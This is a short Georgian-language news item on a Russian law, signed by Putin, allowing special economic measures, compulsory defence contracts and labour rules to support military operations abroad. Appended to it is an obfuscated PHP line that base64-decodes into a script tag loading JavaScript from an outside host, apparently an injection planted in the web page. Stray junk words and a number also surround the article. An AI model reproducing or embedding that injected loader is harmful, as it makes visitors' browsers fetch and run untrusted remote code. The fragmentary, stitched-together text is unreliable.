celsiusi
ავერსი შნაიდერი
რუსეთის პრეზიდენტმა ვლადიმერ პუტინმა ხელი მოაწერა კანონს, რომელიც საშუალებას აძლევს მთავრობას ეკონომიკურ სფეროში სპეციალური ზომები შემოიღოს. ამის შესახებ რუსული მედია იუწყება.
 
კერძოდ, საუბარია რუსეთის შეიარაღებული ძალების მხარდაჭერაზე "კონტრტერორისტული და სხვა ოპერაციების" დროს ქვეყნის ფარგლებს გარეთ.
 
ახალი კანონის თანახმად, იურიდიული პირები რუსეთში ვერ შეძლებენ უარი თქვან სახელმწიფო შესყიდვების, ან სახელმწიფო თავდაცვის შეკვეთების ფარგლებში ხელშეკრულებების დადებაზე, როდესაც ეს კონტრაქტები ეხება ამ „ოპერაციების“ განხორციელებას.
 
ასევე, რუსეთის მთავრობას შეეძლება დააწესოს სპეციალური „შრომითი ურთიერთობების სამართლებრივი რეგულირება ცალკეულ ორგანიზაციებში“, რომელიც ეხება ღამით, შაბათ-კვირას და არდადეგებზე მუშაობას.
 
ამავდროულად, რუსეთის მთავრობამ მიიღო უფლება, დროებით გაეაქტიურებინა სამობილიზაციო ძალები და საშუალებები და სახელმწიფო რეზერვში არსებული მატერიალურ აქტივებზე ჯავშნის გაუქმების უფლება.
 
ეკონომიკაში სპეციალური ღონისძიებების შესახებ კანონპროექტი რუსეთის მთავრობამ შეიმუშავა.
897
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");